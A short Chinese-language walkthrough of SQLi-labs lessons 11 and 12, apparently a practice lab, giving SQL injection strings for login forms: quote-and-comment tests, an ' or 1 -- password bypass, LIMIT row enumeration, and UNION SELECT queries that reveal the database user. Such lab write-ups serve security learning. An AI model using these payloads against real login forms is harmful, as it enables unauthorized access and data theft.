Less11

判断是否可以注入

用户输入'密码随便输入一个acbd

发现他报错了
我们在输入用户' -- 密码随便输入一个acbd
什么都没有显示

说明是存在sql注入漏洞的

无密码登录

如果我们知道他一个用户就可以登录进去
用户输入一个知道的用户admin
密码输入' or 1 --
发现直接就显示了

无用户无密码登录

应为他这个是显示用户名和密码的我们就可以用 LIMIT 0,1来逐个显示
用户不要输入
密码输入' or 1 LIMIT 1,1 --

数据查询

判断注入位置

用户输入' union select 1,2 --
密码随便输入
可以看到是1和2

基本信息查询

查询用户名
用户输入' union select 1,user() --
密码随便输入

其他注入就和普通的sql注入查询一样了

Less12

判断是否可以注入

当我用户输入'
密码输入a"
他显示sql语句报错了
发现输入"会报错
上面还显示了)说明是("")

数据查询

判断注入位置

其实和上面的Less11差不多就是前面是")
用户输入" ) union select 1,2 --
密码随便输入

基本信息查询

用户输入" ) union select 1,user() --
密码随便输入

其他注入就和普通的sql注入查询一样了